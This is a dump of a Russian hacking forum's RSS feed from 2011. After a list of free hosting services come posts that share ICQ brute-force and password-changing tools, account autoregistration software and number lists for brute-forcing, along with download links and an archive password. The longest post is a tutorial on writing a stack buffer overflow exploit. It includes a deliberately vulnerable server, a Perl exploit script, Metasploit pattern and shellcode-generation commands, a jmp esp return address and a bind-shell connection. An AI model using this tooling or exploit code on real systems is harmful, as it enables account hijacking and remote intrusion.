						&lt;p&gt;&amp;quot;My.ElVisti.com&amp;quot; - бесплатный хостинг &lt;br /&gt;Возможность бесплатного размещения Web-страницы. Правила регистрации. Условия использования. Технические вопросы. Алфавитный указатель размещенных страниц.&lt;br /&gt;my.elvisti.com &lt;/p&gt;
						&lt;p&gt;&amp;quot;Hercules&amp;quot; - бесплатный хостинг&lt;br /&gt;Возможность бесплатно разместить веб-сайт (есть поддержка PHP и MySQL).&lt;br /&gt;host.net.kg&lt;/p&gt;
						&lt;p&gt;&amp;quot;Интернет-Белогорье&amp;quot; - региональная сеть &lt;br /&gt;Хостинг интернет-страниц для образовательных учреждений Белгорода и области.&lt;br /&gt;[forbidden link] &lt;/p&gt;
						&lt;p&gt;&amp;quot;MiraHost&amp;quot; - бесплатный хостинг &lt;br /&gt;Поддержка MySQL, PHP и Perl, доменов 2 уровня. Условия предоставления услуг. Онлайн-заказ. Форум поддержки.&lt;br /&gt;wwwmirahost.ru &lt;/p&gt;
						&lt;p&gt;Сервер домашних страниц Великого Новгорода &lt;br /&gt;Бесплатный хостинг для домашних страниц. Правила регистрации. Список страниц пользователей.&lt;br /&gt;home.novgorod.ru &lt;/p&gt;
						&lt;p&gt;&amp;quot;Page.by&amp;quot;- бесплатный хостинг белорусских проектов&lt;br /&gt;wwwpage.by &lt;/p&gt;
						&lt;p&gt;&amp;quot;Крастелекомсервис&amp;quot; - хостинг веб-страниц &lt;br /&gt;Бесплатный хостинг. Информация для пользователей, правила регистрации. Каталог сайтов, размещенных на сервере, с комментариями авторов.&lt;br /&gt;home.kts.ru &lt;/p&gt;
						&lt;p&gt;&amp;quot;ИнтернетХост&amp;quot; - услуги хостинга &lt;br /&gt;Платный хостинг c PHP и MySQL, регистрация доменов, бесплатный хостинг для существующих доменов, услуги по созданию и поддержке сайтов.&lt;br /&gt;internethost.ru &lt;/p&gt;
						&lt;p&gt;&amp;quot;ОсликUa&amp;quot; - бесплатный хостинг &lt;br /&gt;Онлайн-заказ пакета услуг. Информация о дополнительных услугах. Статьи по поисковой оптимизации сайтов.&lt;br /&gt;site.oslikua.com &lt;/p&gt;
						&lt;p&gt;&amp;quot;Pesni.ru&amp;quot; - бесплатный хостинг для музыкантов &lt;br /&gt;Неограниченное место под официальные сайты музыкальным группам, авторам и исполнителям песен на сервере Песни.ру.&lt;br /&gt;wwwpesni.ru/hosting.shtml &lt;/p&gt;
						&lt;p&gt;Хостинг для некоммерческих организаций &lt;br /&gt;Некоммерческий проект. Предлагаются услуги хостинга для экологических и некоммерческих организаций и проектов. Информация об условиях сотрудничества, регистрация, демонстрация хостинга.&lt;br /&gt;wwwenviron.ru &lt;/p&gt;
						&lt;p&gt;&amp;quot;Колобок&amp;quot; - размещение домашних страниц &lt;br /&gt;Хостинг домашних веб-страниц. Онлайновая веб-мастерская, ссылки.&lt;br /&gt;wwwkolobok.ru/home &lt;/p&gt;
						&lt;p&gt;tut.su&lt;/p&gt;
						&lt;p&gt;Бесплатная регистрация домена 3 уровня + домена 2 уровня (при опр. условиях)&lt;br /&gt;Поддержка php&lt;br /&gt;MySql&lt;br /&gt;Дисковое пространство в 100 Mb + возможность увеличить&lt;/p&gt;
						&lt;p&gt;Freehostia.Com&lt;br /&gt;Бесплатный тариф &amp;quot;Chocolate&amp;quot;&lt;br /&gt;Поддержка PHP, MySQL&lt;br /&gt;250 MB дискового пространства&lt;br /&gt;Возможность создания трех POP3/IMAP почтовых ящика&lt;br /&gt;Возможность привязки собственного домена&lt;br /&gt;wwwfreehostia.com&lt;/p&gt;</description>
			<author>mybb@mybb.ru (administrator)</author>
			<pubDate>Tue, 08 Mar 2011 10:38:07 +0300</pubDate>
			<guid>https://forumis.fludilka.su/viewtopic.php?pid=16#p16</guid>
		</item>
		<item>
			<title>AutoRegger Yandex v0.2 by BuHT73</title>
			<link>https://forumis.fludilka.su/viewtopic.php?pid=12#p12</link>
			<description>&lt;p&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;https://savepic.org/1343069.jpg&quot; alt=&quot;http://savepic.org/1343069.jpg&quot; /&gt;&lt;br /&gt;Простой Авторегер Яндекс мыл. &lt;/p&gt;
						&lt;p&gt;Автор: BuHT73&lt;br /&gt;&lt;a href=&quot;http://upwap.ru/1320973&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://upwap.ru/1320973&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;&lt;strong&gt;Пароль: 228&lt;/strong&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (administrator)</author>
			<pubDate>Tue, 08 Mar 2011 00:03:42 +0300</pubDate>
			<guid>https://forumis.fludilka.su/viewtopic.php?pid=12#p12</guid>
		</item>
		<item>
			<title>Базы номеров для брута</title>
			<link>https://forumis.fludilka.su/viewtopic.php?pid=11#p11</link>
			<description>&lt;p&gt;&lt;span style=&quot;font-size: 14px&quot;&gt;Базы номеров для брута.&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;&lt;strong&gt;Тут выкладываем базы для брута у кого что есть в зависимости от актуальности и пользы&lt;br /&gt;Флуд будет караться а активность соответственно поощратся&lt;/strong&gt;&lt;/p&gt;
						&lt;p&gt;Хороший сайтик с базам 6,7,8,9*&lt;br /&gt;&lt;a href=&quot;http://file.alice2k.name/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://file.alice2k.name/&lt;/a&gt;&lt;br /&gt;Тут есть Базы ICQ,Даты Реги,Города,Nick Names.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (administrator)</author>
			<pubDate>Mon, 07 Mar 2011 23:55:42 +0300</pubDate>
			<guid>https://forumis.fludilka.su/viewtopic.php?pid=11#p11</guid>
		</item>
		<item>
			<title>UBrute 1.5</title>
			<link>https://forumis.fludilka.su/viewtopic.php?pid=10#p10</link>
			<description>&lt;p&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;https://ubrute.com/images/ubrute_1.5_release_2.png&quot; alt=&quot;http://ubrute.com/images/ubrute_1.5_release_2.png&quot; /&gt;&lt;br /&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;https://ubrute.com/images/ubrute_1.5_release_3.png&quot; alt=&quot;http://ubrute.com/images/ubrute_1.5_release_3.png&quot; /&gt;&lt;br /&gt;Представляю новую версию UBrute. В ней было убрано много нерабочего и не юзаемого функционала. Было решено убрать встроенный сменщик, подробную стату по потокам и прокси, график а также редактор листов. Взамен был добавлен новый функционал:&lt;br /&gt;ICQ бот.&lt;br /&gt;Автообновление прокса по ссылке.&lt;br /&gt;Брут через MD5 авторизацию.&lt;br /&gt;Команды бота:&lt;/p&gt;
						&lt;p&gt;Новый функционал практически не тестился так, что в случае каких то фатальных багов описывайте в теме по возможности всё будет исправлено.&lt;/p&gt;
						&lt;p&gt;Скачать:&lt;br /&gt;&lt;a href=&quot;http://slil.ru/29581863&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;slil.ru&lt;/a&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (administrator)</author>
			<pubDate>Mon, 07 Mar 2011 23:54:46 +0300</pubDate>
			<guid>https://forumis.fludilka.su/viewtopic.php?pid=10#p10</guid>
		</item>
		<item>
			<title>UPassChanger v1.3</title>
			<link>https://forumis.fludilka.su/viewtopic.php?pid=9#p9</link>
			<description>&lt;p&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;https://img248.imageshack.us/img248/3235/77718303.png&quot; alt=&quot;http://img248.imageshack.us/img248/3235/77718303.png&quot; /&gt;&lt;br /&gt;Очередная версия сменщика паролей для ICQ. На этот раз он имеет относительно неплохую скорость (порядка 8-10 паролей в минуту) и возможность смены паролей у инвизов. Из недостатков невозможность поменять пароли у номеров с короткими паролями (короче 4 символов). Интерфейс аналогичен версии 1.2.&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: red&quot;&gt;Скачать:&lt;/span&gt;&lt;br /&gt;&lt;a href=&quot;http://www.sendspace.com/file/jky8q9&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.sendspace.com/file/jky8q9&lt;/a&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (administrator)</author>
			<pubDate>Mon, 07 Mar 2011 23:54:08 +0300</pubDate>
			<guid>https://forumis.fludilka.su/viewtopic.php?pid=9#p9</guid>
		</item>
		<item>
			<title>Фабрика сплоитов: учимся писать эксплоиты для Metasploit Framework</title>
			<link>https://forumis.fludilka.su/viewtopic.php?pid=8#p8</link>
			<description>&lt;p&gt;Откуда берутся сплоиты? Задумывался ли ты, каким образом тусклая новость из багтрака превращается в реально работающую отмычку? Каким образом двумя десяткам строчек кода удается получить шелл на удаленном сервере? Сегодня мы посетим фабрику сплоитов и во всех подробностях посмотрим, как изготавливается качественное изделие.&lt;/p&gt;
						&lt;p&gt;Сплоит – что же это за зверь такой диковинный? По сути, это программа, написанная с целью использования уязвимости – в ОС, обычной программе или веб-приложении. Он может представлять из себя что угодно – программку на С/С++ (Delphi, Asm), скриптик на Perl или PHP, или даже находиться внутри картинки, но главное, что он влияет на уязвимую систему и заставляет ее работать так, как она не запрограммирована. Удаленный эксплоит работает через сеть и использует уязвимость без какого-либо предварительного доступа к уязвимой системе. Локальные же сплоиты запускаются непосредственно в уязвимой системе, требуя предварительного доступа к ней и обычно используются для повышения привилегий. &lt;/p&gt;
						&lt;p&gt;Сплоиты можно разделить по типу используемой уязвимости: переполнение буфера, SQL-инъекция, межсайтовый скриптинг и т.д. Короче говоря, разновидностей бывает много и каждая из них отличается как техникой исполнения, так и своей целью. Но есть в них одно общее – все они содержат код, выполняющий задуманные хакером действия. Этот код называют: байт-код, шелл-код (так как очень часто этот код предоставляет доступ к шеллу на удаленной системе), полезной (боевой) нагрузкой (payload). Написание такого кода – целое искусство. Если хочешь разобраться в этой области, советую начать со статьи Step&#039;а &amp;quot;Откуда берутся шеллкоды&amp;quot;. Мы же рассмотрим процесс написания эксплоита, а шелл-код возьмем уже готовый из пакета Metasploit.&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: red&quot;&gt;&lt;strong&gt;Пишем жертву для экспериментов&lt;/strong&gt;&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Убежден, что нет более наглядного способа продемонстрировать создание боевого кода, чем на конкретном примере. Поэтому начнем с игры в горе-программистов и наваяем небольшое серверное приложение, оставив в нем критическую уязвимость, которую и будет эксплуатировать. Приложение будет принимать подключения на определенном порту: как только придет некоторый пакет, будет вызываться функция, выполняющая некоторые действия с полученными данными, после чего приложение завершается. Скелет приложения приведен ниже:&lt;/p&gt;
						&lt;p&gt;void pr( char *str)&lt;/p&gt;
						&lt;p&gt;{&lt;/p&gt;
						&lt;p&gt;char buf[500]=&amp;quot;&amp;quot;;&lt;/p&gt;
						&lt;p&gt;strcpy(buf,str); // вот и сама уязвимость, собственной персоной&lt;/p&gt;
						&lt;p&gt;}&lt;br /&gt;&lt;/p&gt;
						&lt;p&gt;int main(int argc, char **argv)&lt;/p&gt;
						&lt;p&gt;{&lt;/p&gt;
						&lt;p&gt;....................&lt;/p&gt;
						&lt;p&gt;int bytesRecv = SOCKET_ERROR;&lt;/p&gt;
						&lt;p&gt;while( bytesRecv == SOCKET_ERROR )&lt;/p&gt;
						&lt;p&gt;{&lt;/p&gt;
						&lt;p&gt;//Получаем данные, отправленные клиентом&lt;/p&gt;
						&lt;p&gt;bytesRecv = recv( clientSocket, Message, 5000, 0 );&lt;br /&gt;&lt;/p&gt;
						&lt;p&gt;if ( bytesRecv == 0 || bytesRecv == WSAECONNRESET )&lt;/p&gt;
						&lt;p&gt;{&lt;/p&gt;
						&lt;p&gt;printf( &amp;quot;\nConnection Closed.\n&amp;quot;);&lt;/p&gt;
						&lt;p&gt;break;&lt;/p&gt;
						&lt;p&gt;}&lt;/p&gt;
						&lt;p&gt;}&lt;br /&gt;&lt;/p&gt;
						&lt;p&gt;pr(Message); // вызываем функцию, которая не проверяет длину входного буфера при &lt;br /&gt;копировании&lt;br /&gt;&lt;/p&gt;
						&lt;p&gt;closesocket(clientSocket);&lt;/p&gt;
						&lt;p&gt;closesocket(serverSocket);&lt;/p&gt;
						&lt;p&gt;WSACleanup();&lt;/p&gt;
						&lt;p&gt;return 0;&lt;/p&gt;
						&lt;p&gt;}&lt;/p&gt;
						&lt;p&gt;Внимательно взглянув на код, можно увидеть, что функция void pr(char *str) не проверяет длину входного буфера и, если передать ей в качестве параметра строку длиной более 500 символов - получится классическое переполнение буфера. Совсем кратко о том, как это работает (тут придется вспомнить, как работает стек):&lt;/p&gt;
						&lt;p&gt;PUSH EDI // кладем в стек указатель, на буфер, который будем копировать &lt;br /&gt;(*str)&lt;/p&gt;
						&lt;p&gt;CALL Server._pr // вызываем функцию pf&lt;/p&gt;
						&lt;p&gt;После вызова CALL стек будет выглядеть следующим образом:&lt;/p&gt;
						&lt;p&gt;....&lt;br /&gt;buf - локальная переменная, куда будем копировать входящие данные&lt;br /&gt;ebp - сохраненный указатель кадра стека&lt;br /&gt;ret - адрес возврата&lt;br /&gt;*str - указатель на входящий буфер&lt;br /&gt;....&lt;/p&gt;
						&lt;p&gt;Под переменную buf у нас выделено 500 байт. А что будет, если скопировать туда строку длиннее?&lt;/p&gt;
						&lt;p&gt;[buf][EBP][ret][*str]&lt;/p&gt;
						&lt;p&gt;[AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]&lt;/p&gt;
						&lt;p&gt;Как видишь, такая строка затрет EBP, адрес возврата и все, что расположено ниже по стеку – перезапиши адрес возврата нужным нам значением и тогда при выходе из функции мы можем вернуться, куда захотим, например, на наш шелл-код.&lt;/p&gt;
						&lt;p&gt;Правда, стоит сделать поправку: уязвимости может и не быть. В смысле, от такой критической ошибки, конечно, никуда не деться, и программа в любом случае будет падать, однако использовать переполнение в сплоите может и не получиться. Виной тому стековые куки – специальная защита, включаемая в бинарник компилятором во время сборки приложения. Существует несколько способов обхода такой защиты (подробнее – смотри ниже), но сейчас для простоты примера предположим, что стековые кукисы отключены. Поэтому либо отключаем поддержку кукисов во время компиляции в Visual Studio, либо используем компилятор, который вообще не умеет встраивать подобную защиту. Второй вариант, как мне кажется, проще – так как можно использовать бесплатный компилятор lccwin32. Компилируем и запускаем.&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: red&quot;&gt;&lt;strong&gt;Убить наповал!&lt;/strong&gt;&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Сервер работает ровно до тех пор, пока ему не придет строка, состоящая более чем из 500 символов. В противном случае – непременно вылет приложения. Набросаем небольшой скриптик на Perl&#039;е для эксплуатации переполнения буфера:&lt;/p&gt;
						&lt;p&gt;use strict;&lt;/p&gt;
						&lt;p&gt;use Socket;&lt;/p&gt;
						&lt;p&gt;my $junk = &amp;quot;\x41&amp;quot; x1000;&lt;br /&gt;&lt;/p&gt;
						&lt;p&gt;# адрес и порт узявимого демона&lt;/p&gt;
						&lt;p&gt;my $host = shift || &#039;localhost&#039;;&lt;/p&gt;
						&lt;p&gt;my $port = shift || 200;&lt;/p&gt;
						&lt;p&gt;my $proto = getprotobyname(&#039;tcp&#039;);&lt;br /&gt;&lt;/p&gt;
						&lt;p&gt;# осуществляем привязки&lt;/p&gt;
						&lt;p&gt;my $iaddr = inet_aton($host);&lt;/p&gt;
						&lt;p&gt;my $paddr = sockaddr_in($port, $iaddr);&lt;br /&gt;&lt;/p&gt;
						&lt;p&gt;print &amp;quot;[+] Setting up socket\n&amp;quot;;&lt;/p&gt;
						&lt;p&gt;# создаем сокет и присоединяемся к порту&lt;/p&gt;
						&lt;p&gt;socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die &amp;quot;socket: $!&amp;quot;;&lt;/p&gt;
						&lt;p&gt;print &amp;quot;[+] Connecting to $host on port $port\n&amp;quot;;&lt;/p&gt;
						&lt;p&gt;connect(SOCKET, $paddr) or die &amp;quot;connect: $!&amp;quot;;&lt;br /&gt;&lt;/p&gt;
						&lt;p&gt;print &amp;quot;[+] Sending payload\n&amp;quot;;&lt;/p&gt;
						&lt;p&gt;print SOCKET $junk.&amp;quot;\n&amp;quot;;&lt;br /&gt;&lt;/p&gt;
						&lt;p&gt;print &amp;quot;[+] Payload sent\n&amp;quot;;&lt;br /&gt;&lt;/p&gt;
						&lt;p&gt;close SOCKET or die &amp;quot;close: $!&amp;quot;;&lt;/p&gt;
						&lt;p&gt;Скрипт просто соединяется с сервером и посылает ему строку символов &amp;quot;А&amp;quot; длиной 1000 ($junk = &amp;quot;\x41&amp;quot; x1000). Чтобы наглядно посмотреть, что в момент получения такой строки происходит внутри нашего сервера, запускаем его под отладчиком – идеально, под OllyDbg. Выбираем наш бинарник через меню &amp;quot;File -&amp;gt; Open&amp;quot; и отдаем команду на выполнение: &amp;quot;Debug -&amp;gt; Restart -&amp;gt; Run&amp;quot;. Далее запускаем простенький сплоит, который, как и следовало ожидать, убивает наш сервер наповал. Смотрим в отладчик - адрес возврата из функции pf (и, как следствие, регистр EIP, указывающий на следующую инструкцию) оказывается перезаписанным значением 41414141 (как ты помнишь, 0х41 - это символ А). Но на момент, когда мы будем глядеть в отладчик, уже произойдет возврат по адресу 41414141, и мы будем видеть только EIP. Для успешной эксплуатации уязвимости нужно построить ядовитую строку так, чтобы она переписывала адрес возврата нужным нам значением - адресом нашего шелл-кода. Поэтому сначала необходимо выяснить, какие именно символы строки затирают адрес возврата. В этом поможет одна из утилит Metasploit Framework. Но перед этим предлагаю тебе быстренько ознакомиться с Фреймворком.&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: red&quot;&gt;&lt;strong&gt;Используем Metasploit для разработки эксплоита&lt;/strong&gt;&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Символов в передаваемой строке 1000, все они одинаковые, поэтому неудивительно, что в строке возврата появляется значение, состоящее из буквы A. Но если составить строку, которая будет состоять из неповторяющихся буквенно-числовых строк, то легко определить позицию тех символов, которые попадают в адрес возврата. Генерацией такой строки как раз и занимается утилита, входящая в состав Metasploit, pattern_gererate. В качестве единственного обязательного параметра передается длина строки. Итак, создадим буфер длиной в 1000 символов для дальнейшего использования в нашем сплоите:&lt;/p&gt;
						&lt;p&gt;msf &amp;gt; ruby pattern_create.rb 1000&lt;/p&gt;
						&lt;p&gt;Aa0Aa1Aa2Aa3 [967 символов вырезано злым редактором] Bh0Bh1Bh2Bh&lt;/p&gt;
						&lt;p&gt;А в скрипте заменим значение переменной $junk на вышеприведенную последовательность. Заново запускаем наш уязвимый сервер, подключаемся к нему в OllyDbg и запускаем эксплоит. Сервер опять падает. Что ж, давай взглянем, что на этот раз оказалось в регистре EIP? EIP = 41387141. Чтобы определить смещение символов в строке, используем другую утилиту из набора Metasploit - pattern_offset, передавая в параметрах искомую величину и длину буфера:&lt;/p&gt;
						&lt;p&gt;my $totalbuffer = 1000;&lt;/p&gt;
						&lt;p&gt;# длина буфера&lt;/p&gt;
						&lt;p&gt;my $junk = &amp;quot;\x41&amp;quot; x 504;&lt;/p&gt;
						&lt;p&gt;# первые 504 символа &amp;quot;А&amp;quot;&lt;/p&gt;
						&lt;p&gt;my $eipoverwrite = &amp;quot;\x42&amp;quot; x 4; &lt;/p&gt;
						&lt;p&gt;# 4 символа &amp;quot;В&amp;quot;, которые перезапишут адрес возврата&lt;/p&gt;
						&lt;p&gt;my $junk2 = &amp;quot;\x43&amp;quot; x ($totalbuffer-length($junk.$eipoverwrite));&lt;/p&gt;
						&lt;p&gt;# оставшееся место в буфере заполняем символами &amp;quot;С&amp;quot;&lt;/p&gt;
						&lt;p&gt;И заменяем строчку кода, отправляющую сформированную строку в сокет, на:&lt;/p&gt;
						&lt;p&gt;print SOCKET $junk.$eipoverwrite.$junk2.&amp;quot;\n&amp;quot;;&lt;/p&gt;
						&lt;p&gt;Чтобы проверить, запускаем эксплоит и смотрим в отладчик. Ага, так и есть: EIP = 42424242. Увы, тысячи символов слишком мало, чтобы уместить шелл-код, поэтому попробуем увеличить длину ядовитой строки и посмотреть, как будет работать сплоит. Длину выбираем экспериментально: методом проб и ошибок. После увеличения длины с 1000 до 2000 (my $totalbuffer = 2000) убеждаемся, что сплоит по-прежнему работает так же успешно. А это значит, мы имеем 2000-4-504=1492 байта для размещения нашего шелл-кода. Все это прекрасно, но как передать управление шелл-коду – ведь его адреса мы не знаем! Давай посмотрим, что у нас происходит со стеком в момент переполнения. Поставим в отладчике бряк на функцию strcpy:&lt;/p&gt;
						&lt;p&gt;0040130B: CALL 00404351&lt;/p&gt;
						&lt;p&gt;И запускаем эксплоит. Бряк сработал, – смотрим, что в стеке (в olly стек показывается в правом нижнем углу и имеет формат &amp;quot;адрес - значение – комментарий; типа return to kernel32.728232&amp;quot;):&lt;/p&gt;
						&lt;p&gt;[buf][ebp][ret][предыдущий стековый фрейм]&lt;/p&gt;
						&lt;p&gt;Нажимаем &amp;lt;F8&amp;gt; (перейти на следующую инструкцию) и отмечаем изменения в стеке:&lt;/p&gt;
						&lt;p&gt;[buf][ebp][ret][предыдущий стековый фрейм]&lt;/p&gt;
						&lt;p&gt;[AAAAAAAA][BBB][CCCCCCCC…]&lt;/p&gt;
						&lt;p&gt;Теперь взглянем на конец функции pf:&lt;/p&gt;
						&lt;p&gt;00401313 POP EDI&lt;/p&gt;
						&lt;p&gt;00401314 POP ESI&lt;/p&gt;
						&lt;p&gt;00401315 LEAVE&lt;/p&gt;
						&lt;p&gt;00401316 RETN&lt;/p&gt;
						&lt;p&gt;При вызове команды LEAVE происходит следующее:&lt;/p&gt;
						&lt;p&gt;MOV ESP, EBP //теперь в ESP содержится адрес [ebp]&lt;/p&gt;
						&lt;p&gt;POP EBP // в EBP заносится значение из [ebp] (эта область у нас перезаписана &lt;br /&gt;символами &amp;quot;А&amp;quot;, следовательно, EBP будет равен 41414141), ESP теперь указывает на &lt;br /&gt;адрес возврата.&lt;/p&gt;
						&lt;p&gt;При выполнении команды RETN из стека выталкивается адрес возврата – поэтому получается, что ESP указывает на начало стекового фрейма, то есть на $junk2, где мы и будем размещать наш шелл-код. А как перейти по адресу, лежащему в esp? Хороший вопрос!&lt;/p&gt;
						&lt;p&gt;Переход к ESP – вполне обычное действие для виндовых приложений. Более того, любое такое приложение использует, как минимум, одну системную DLL’ку, в которых есть инструкции на любой вкус. Адреса в таких DLL&#039;ках, как правило, статичны и не изменяются! Получается, если найти инструкцию перехода на ESP (а это либо jmp esp, либо push esp + ret, либо call esp), взять ее адрес и заменить им адрес возврата, то на выходе из функции управление передастся на ESP – прямиком нашему шелл-коду.&lt;/p&gt;
						&lt;p&gt;Есть один момент, который стоит упомянуть! Адрес возврата не должен содержать нулевых байтов, ведь функция strcpy воспримет все как признак конца строки и не скопирует оставшуюся часть буфера, то есть $junk2, куда мы хотели разместить шелл-код. Поэтому мы будем искать инструкцию перехода по esp в динамических библиотеках, используемых приложением, так как адрес такой инструкции в библиотеках будет выше, и не будет занимать все четыре байта – исключая возможность появления нуля в начале.&lt;/p&gt;
						&lt;p&gt;Осуществлять поиск будем с помощью полезной утилиты findjmp, входящей в состав пакета тулз MSF eXploit Builder – он нам понадобится и позже. Прога ищет адрес команды call, jmp, push + регистр и ret в dll или приложении. Наша программа работает с сокетами, и значит, она будет использовать стандартную виндовую библиотеку ws2_32.dll. Посмотрим, есть ли там интересующий нас опкод (то есть машинные инструкции, соответствующие передаче управления на ESP). Запускаем с указанием, во-первых, библиотеки для поиска, и, во-вторых, нужного регистра:&lt;/p&gt;
						&lt;p&gt;Findjmp2.exe ws2_32.dll esp&lt;/p&gt;
						&lt;p&gt;Scanning ws2_32.dll for code useable with the esp register&lt;/p&gt;
						&lt;p&gt;0x71AB9372 push esp - ret&lt;/p&gt;
						&lt;p&gt;Finished Scanning ws2_32.dll for code useable with the esp register&lt;/p&gt;
						&lt;p&gt;Found 1 usable addresses&lt;/p&gt;
						&lt;p&gt;Найден один подходящий нам адрес - 0x71AB9372. Кстати, если вдруг нужного опкода в другой ситуации не найдется – не беда, можно поискать в kernel32.dll, которая используется всеми приложениями. Аналогичный поиск по этой библиотеке дает еще два подходящих адреса. В действительности, это не самый удачный вариант и искать опкоды в системных библиотеках стоит в самом последнем случае. Дело в том, что библиотеки различаются от системе к системе и даже от версии сервиспака, установленного в винде. Адрес 0x71AB9372 действителен только для английской Windows XP SP2 – для другой системы он будет другой! Именно поэтому подходящие опкоды стоит искать в DLL&#039;ках, которые устанавливает в систему сама программа – только в этом случае есть шанс написать независящий от версии Windows сплоит. В нашем случае, увы, такой вариант невозможен в виду простоты примера, но свои динамические библиотеки для реального виндового приложения – это в большинстве случаев норма.&lt;/p&gt;
						&lt;p&gt;Осталось только создать шелл-код. Как я уже говорил, к сплоиту предъявляется одно важное требование - он не должен содержать нулевых байтов. В программе копируется строка, и если встретится &amp;quot;0&amp;quot;, он будет воспринят как конец строки. Соответственно, оставшаяся часть строки не скопируется, а неполный шелл-код, естественно, не будет работать. В создании шелл-кода нам опять поможет Metasploit и консольный интерфейс для управления фреймворком. Итак, запускаем консоль tools/msfconsole и вводим следующее:&lt;/p&gt;
						&lt;p&gt;msf &amp;gt; use windows/shell_bind_tcp // будем использовать этот payload&lt;/p&gt;
						&lt;p&gt;msf payload(shell_bind_tcp) &amp;gt; set LPORT 5555 // устанавливаем значение порта на &lt;br /&gt;удаленной машине&lt;/p&gt;
						&lt;p&gt;LPORT =&amp;gt; 5555&lt;/p&gt;
						&lt;p&gt;С помощью команды &amp;quot;generate -h&amp;quot; посмотрим опции, которые можно указать для генерации шелл-кода:&lt;br /&gt;-b &amp;lt;opt&amp;gt; - список символов, которые следует исключить из шелл-кода;&lt;br /&gt;-f &amp;lt;opt&amp;gt; - имя файла, куда сохраняется шелл-код;&lt;br /&gt;-t &amp;lt;opt&amp;gt; - тип шелл-кода: ruby, perl, c или raw.&lt;/p&gt;
						&lt;p&gt;Указываем, что надо избегать байтов &#039;\x00\xff&#039;, генерировать код для Perl&#039;a и сохранить полученные результаты в c:\\shellcode.bin:&lt;/p&gt;
						&lt;p&gt;msf payload(shell_bind_tcp) &amp;gt; generate -b &#039;\x00\xff&#039; -f c:\\shellcode.bin &lt;br /&gt;-t perl&lt;/p&gt;
						&lt;p&gt;[*] Writing 1747 bytes to c:\shellcode.bin...&lt;/p&gt;
						&lt;p&gt;Вот теперь, имея на руках шелл-код, настало время собрать полноценный эксплоит. Единственное – нужно помнить несколько моментов:&lt;br /&gt;в шелл-коде не должны встречаться 0xff и 0x00 байты, но мы об этом уже позаботились;&lt;br /&gt;непосредственно перед шелл-кодом нужно поместить цепочки из NOP (машинная команда - нет операции) – на случай, если мы чуть-чуть накосячили с адресом возврата.&lt;/p&gt;
						&lt;p&gt;Отправляемая серверу строка будем формироваться следующим образом:&lt;/p&gt;
						&lt;p&gt;my $junk = &amp;quot;\x90&amp;quot; x 504; // первые 504 NOP’a&lt;/p&gt;
						&lt;p&gt;#jmp esp (from ws2_32.dll)&lt;/p&gt;
						&lt;p&gt;my $eipoverwrite = pack(&#039;V&#039;,0x71AB9372); // перезаписываем адрес возврата &lt;br /&gt;значением 0x71AB9372&lt;/p&gt;
						&lt;p&gt;#add some NOP&#039;s&lt;/p&gt;
						&lt;p&gt;my $shellcode=&amp;quot;\x90&amp;quot; x 50; // добавляем 50 nop-ов перед шелл-кодом&lt;/p&gt;
						&lt;p&gt;// прибавляем сгенерированный нами шелл-код (windows/shell_bind_tcp)&lt;/p&gt;
						&lt;p&gt;$shellcode=$shellcode.&amp;quot;\xbb\x2e\ [и тут тоже кушал редактор ] xd3&amp;quot;; &lt;/p&gt;
						&lt;p&gt;Окончательно строка, отправляемая в сокет:&lt;/p&gt;
						&lt;p&gt;// и отправляем ядовитую строку серверу&lt;/p&gt;
						&lt;p&gt;print SOCKET $junk.$eipoverwrite.$shellcode.&amp;quot;\n&amp;quot;;&lt;/p&gt;
						&lt;p&gt;После чего пытаемся в сплоите установить соединение с удаленной машиной на 5555 порту, который мы указали при генерации шелл-кода:&lt;/p&gt;
						&lt;p&gt;system(&amp;quot;telnet $host 5555&amp;quot;);&lt;/p&gt;
						&lt;p&gt;Запускаем эксплоит и… о чудо, он работает! Протестировав эксплоит на различных ОС (Windows XP SP3), можно увидеть, что значение смещения не меняется - меняется только наш адрес возврата.&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: red&quot;&gt;&lt;strong&gt;Эксплоит для Metasploit&lt;/strong&gt;&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Итак, у нас есть сплоит для конкретной платформы с вполне определенной нагрузкой, открывающей в системе шелл. Так зачем нужна вообще какая-либо специальная платформа для создания сплоита, если мы вполне обошлись силами одного лишь Perl&#039;а? Причина в том, что Metasploit предоставляет огромное количество заготовок, реализаций различных протоколов, одну из самых больших баз шелл-кодов, payload-ов, которые можно использовать при написании собственного эксплоита. Вместо убогого скрипта на Perl&#039;е можно написать модуль для Metasploit, после чего запускать его на любой платформе и выбирать payload на свой вкус! Чуешь разницу? Предлагаю прямо сейчас усовершенствовать наш сплоит, переписав его для Metasploit, и посмотреть, как это работает. Само собой, он будет обладать возможностью выбора платформы для атаки, а выбирать пейлоад ты сможешь прямо во время исполнения атаки.&lt;/p&gt;
